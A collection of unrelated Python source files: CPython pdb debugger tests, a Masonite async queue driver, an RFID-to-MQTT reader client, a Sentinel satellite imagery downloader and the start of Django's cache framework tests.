for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(support.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with support.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with support.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@support.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with support.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with support.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
support.unlink(support.TESTFN)
def test_checkline_before_debugging(self):
with open(support.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(support.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(support.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(support.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(support.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(support.TESTFN, lineno))
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
unittest.makeSuite(ChecklineTests),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
QueueAsyncDriver.py
|
""" Async Driver Method """
import threading
from masonite.contracts.QueueContract import QueueContract
from masonite.drivers.BaseDriver import BaseDriver
class QueueAsyncDriver(QueueContract, BaseDriver):
"""Queue Aysnc Driver
"""
def __init__(self, Container):
"""Queue Async Driver
Arguments:
Container {masonite.app.App} -- The application container.
"""
self.container = Container
def push(self, *objects):
"""Push objects onto the async stack.
Arguments:
objects {*args of objects} - This can be several objects as parameters into this method.
"""
for obj in objects:
obj = self.container.resolve(obj)
thread = threading.Thread(
target=obj.dispatch(), args=(), kwargs={})
thread.start()
|
__main__.py
|
import argparse
import logging
import json
import time
import sys
# from threading import Thread
import paho.mqtt.client as mqtt
import rc522
import led_rgb
import utils
from __init__ import __version__, APP_NAME, HOST, PORT, LED_PINS, MQTT_TOPIC, LOG_FILE, LOG_FORMAT
def message_led(client, userdata, msg):
""" zpracovává zprávy na téma /led """
data = json.loads(msg.payload.decode('utf-8'))
try:
# kontrola formatu zprávy
if (set(('color', 'blink')).issubset(data)):
color = led_rgb.Color(color_hex=data['color'])
if (int(data['blink']) > 0):
userdata['ledrgb'].blink(color, num=int(data['blink']))
else:
userdata['ledrgb'].switch_on(color)
except Exception as e:
logging.warning(e)
def on_disconnect(client, userdata, rc):
print("Disconnect to {0}:{1}".format(client._host, client._port))
logging.info("Disconnect to {0}:{1}".format(client._host, client._port))
# vypne diodu
userdata['ledrgb'].switch_off()
def on_log(client, userdata, level, string):
logging.log(level, string)
def on_message(client, userdata, msg):
logging.info('on_message', {'msg': msg})
def on_connect(client, userdata, flags, rc):
logging.info('connect', {'flags': flags, 'rc': rc})
if (rc == 0):
print("Connected to {0}:{1}".format(client._host, client._port))
logging.info("Connected to {0}:{1}".format(client._host, client._port))
# odešle se žádost o odběr
client.subscribe(MQTT_TOPIC['LED'].format(client._client_id), 0)
# nastaví fukce pro zpracování zprávy na téma /led
client.message_callback_add(MQTT_TOPIC['LED'].format(client._client_id), message_led)
# odešlou se informace o zařízení
data = {'serial_number': utils.serial_number(), 'version': __version__}
client.publish(MQTT_TOPIC['INFO'].format(client._client_id), json.dumps(data))
def parse_args():
parser = argparse.ArgumentParser(prog=APP_NAME, description='Reader RFID is client BPINI')
parser.add_argument('-v', '--version', action='version', version="%(prog)s (version {0})".format(__version__))
parser.add_argument('-d', '--debug', dest='debug', action='store_true', default=False, help='Debug mode')
parser.add_argument('-H', '--host', dest="host", default=HOST,
help="MQTT host to connect to [default: %(default)d]")
parser.add_argument('-p', '--port', dest="port", type=int, default=PORT,
help="Port for remote MQTT host [default: %(default)d]")
return parser.parse_args()
# def send_info(client):
# while not client.is_stop:
# time.sleep(1.5)
# data = {'serial_number': utils.serial_number(), 'version': __version__}
# client.publish(MQTT_TOPIC['INFO'].format(client._client_id), json.dumps(data))
def main():
args = parse_args()
log_level = args.debug if logging.DEBUG else logging.INFO
logging.basicConfig(filename=LOG_FILE, level=log_level, format=LOG_FORMAT)
# vytvoření klient ID
client_id = '{0}/{1}'.format(APP_NAME, utils.device_id())
ledrgb = led_rgb.LedRGB(LED_PINS['RED'], LED_PINS['GREEN'], LED_PINS['BLUE'])
rfid = rc522.RFID()
print("---- BPINI - READER RFID ----")
print("Client ID: {0}".format(client_id))
logging.info("Client ID: {0}".format(client_id))
# vytvoření MQTT klienta
client = mqtt.Client(client_id)
client.on_message = on_message
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_log = on_log
client.user_data_set({'ledrgb': ledrgb})
# bude se pokoušet připojit dokud se to nepovede
while True:
try:
time.sleep(2)
client.connect(args.host, args.port, 60)
client.loop_start()
break
except Exception as e:
print(e)
logging.warning(e)
except KeyboardInterrupt:
rfid.cleanup()
sys.exit(0)
# client.is_stop=False
# t = Thread(target=send_info, args=(client,))
# t.start()
while (True):
try:
# načtení UID tagu
uid = rfid.read_uid()
if (uid is not None):
# převedení UID na format hex code
uid_hex = ''.join('{0:02x}'.format(uid[x]) for x in range(4))
logging.info("Read TAG UID: {0}".format(uid_hex))
# odeslání zpravy s UID
infot = client.publish(MQTT_TOPIC['TAG'].format(client._client_id), json.dumps({'uid': uid_hex}))
infot.wait_for_publish()
except KeyboardInterrupt:
# client.is_stop=True
# t.join()
client.loop_stop()
client.disconnect()
rfid.cleanup()
break
if __name__ == "__main__":
main()
|
data_download.py
|
import numpy as np
import binascii
import os
import multiprocessing
import wget
import zipfile
import requests
def download_sentinel_data(product_identifier, output_location, verbose=1, timeout=10*60, debug=False):
"""
Download and unzip a tile with satelite data.
Args:
product_identifier (string): Product identifier
output_location (string): Location of where to put unzip output data
verbose (int): Print progress (verbose==1)
timeout (int): seconds to timeout wget. On timeout download is restarted up to 10 times
debug (bool): run on main thread if set to True (timeout is ignored)
Returns:
string: Path to SAFE-folder
"""
tmp_zip_file = os.path.join(output_location,str(os.getpid())+ '_'+ str(binascii.hexlify(os.urandom(16)))+ '_tmp.zip')
safe_file = os.path.join(output_location, product_identifier+'.SAFE')
if verbose:
print('Downloading', product_identifier,get_eocloud_url(product_identifier))
# Download
# We need to do this async as it sometimes freezes
def _download(n_retries=0):
try:
wget.download(get_eocloud_url(product_identifier), out=tmp_zip_file, bar=wget.bar_thermometer if verbose else None)
except Exception as e:
if n_retries:
_download(n_retries-1)
else:
raise e
n_retries = 5
if not debug:
i = 0
completed = False
while i < n_retries and not completed:
i += 1
p = multiprocessing.Process(target=_download, daemon=True)
p.start()
p.join(timeout=timeout)
if p.is_alive():
p.terminate()
p.join()
print('Retrying download.',n_retries- i,'retries left.')
continue
completed = True
if not completed:
raise TimeoutError('Download reached timeout ten times.')
else:
_download(n_retries)
if verbose:
print('\n')
if not os.path.isdir(output_location):
if verbose:
print('Making directory:', output_location)
os.makedirs(output_location)
if verbose:
print('Unziping', product_identifier)
with zipfile.ZipFile(tmp_zip_file) as f:
f.extractall(safe_file)
os.remove(tmp_zip_file)
return safe_file
def get_eocloud_url(product_identifier):
"""
Returns an URL to SAFE-file on eocloud.eu given a product identifier
Args:
product_identifier (string): product identifier given by ESA (eg. S2B_MSIL1C_20180516T072619_N0206_R049_T37LCJ_20180516T102848)
.. Todo:: maybe double check that the base URL is working for all cases
.. Todo:: write tests
Returns:
"""
tile = parse_product_identifier(product_identifier)
product_level = tile['product_level']
year = tile['datetime'].astype(object).year
month = tile['datetime'].astype(object).month
day = tile['datetime'].astype(object).day
return "http://185.48.233.249/Sentinel-2/MSI/{}/{}/{:02d}/{:02d}/{}.SAFE".format(product_level, year, month, day, product_identifier)
def download_file_from_google_drive(google_drive_id, destination):
"""
download files from google drive
Args:
google_drive_id (string): for example, given the url:
https://drive.google.com/uc?id=1YZp2PUR1NYKPlBIVoVRO0Tg1ECDmrnC3&export=download,
the id is 1YZp2PUR1NYKPlBIVoVRO0Tg1ECDmrnC3
destination (string): output file
"""
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params = { 'id' : google_drive_id}, stream = True)
token = get_confirm_token(response)
if token:
params = { 'id' : google_drive_id, 'confirm' : token}
response = session.get(URL, params = params, stream = True)
save_response_content(response, destination)
def parse_product_identifier(product_identifier):
"""
Parse the product identifier
:param product_identifier: (string)
:return: (dict)
"""
# Remove extension
product_identifier = product_identifier.split('.')[0]
# Add product_identifier
out = {'product_identifier': product_identifier}
# Split name into different parts
name_parts = product_identifier.split('_')
# Figure out which sentinel (1, 2, or 3)
out['sentinel_type'] = int(name_parts[0][1])
if out['sentinel_type'] == 2:
"""
Sentinel 2: (after 6th of December, 2016)
MMM_MSIL1C_YYYYMMDDHHMMSS_Nxxyy_ROOO_Txxxxx_<Product Discriminator>.SAFE
The products contain two dates.
The first date (YYYYMMDDHHMMSS) is the datatake sensing time.
The second date is the "<Product Discriminator>" field, which is 15 characters in length, and is used to distinguish between different end user products from the same datatake. Depending on the instance, the time in this field can be earlier or slightly later than the datatake sensing time.
The other components of the filename are:
MMM: is the mission ID(S2A/S2B)
MSIL1C: denotes the Level-1C product level
YYYYMMDDHHMMSS: the datatake sensing start time
Nxxyy: the Processing Baseline number (e.g. N0204)
ROOO: Relative Orbit number (R001 - R143)
Txxxxx: Tile Number field
SAFE: Product Format (Standard Archive Format for Europe)"""
out['product_discriminator'] = _sentinel_datetime_2_np_datetime(name_parts[6])
# We only support the new format
# TODO: add support for older sentinel 1 name formats
if not out['product_discriminator']>np.datetime64('2016-12-06T00:00:00'):
raise NotImplementedError('parse_eodata_folder_name() does not support sentinel-2 data earlier than 6th of December 2016')
out['misson_id'] = name_parts[0]
out['product_level'] = name_parts[1][3:]
out['datetime'] = _sentinel_datetime_2_np_datetime(name_parts[2])
out['processing_baseline_number'] = int(name_parts[3][1:])
out['relative_orbit_number'] = int(name_parts[4][1:])
out['tile_id'] = name_parts[5]
elif out['sentinel_type'] == 1:
""" https://sentinel.esa.int/web/sentinel/user-guides/sentinel-1-sar/naming-conventions """
out['misson_id'] = name_parts[0]
out['mode'] = name_parts[1]
out['product_type'] = name_parts[2][0:3]
out['resolution_class'] = name_parts[2][-1]
out['processing_level'] = int(name_parts[3][0])
out['product_class'] = name_parts[3][1]
out['polarization'] = name_parts[3][2:]
out['datetime'] = _sentinel_datetime_2_np_datetime(name_parts[4])
out['start_date'] = _sentinel_datetime_2_np_datetime(name_parts[4])
out['end_date'] = _sentinel_datetime_2_np_datetime(name_parts[5])
out['absolute_orbit_number'] = int(name_parts[6][1:])
out['mission_data_take_id'] = name_parts[7]
out['product_unique_id'] = name_parts[8]
elif out['sentinel_type'] == 3:
# TODO: add support for sentinel 3 name formats
raise NotImplementedError('parse_eodata_folder_name() does not support sentinel-3 yet')
return out
def _sentinel_datetime_2_np_datetime(sentinel_datetime_string):
date, time = sentinel_datetime_string.split('T')
year = date[0:4]
month = date[4:6]
day = date[6:8]
hour = time[0:2]
min = time[2:4]
sec = time[4:6]
np_datetime_str = year + '-' + month + '-' + day + 'T' + hour + ':' + min + ':' + sec
return np.datetime64(np_datetime_str)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core import signals
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS, get_cache,
close_caches)
from django.core.context_processors import csrf
from django.db import connection, connections, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.signals import setting_changed
from django.test.utils import IgnoreDeprecationWarningsMixin
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
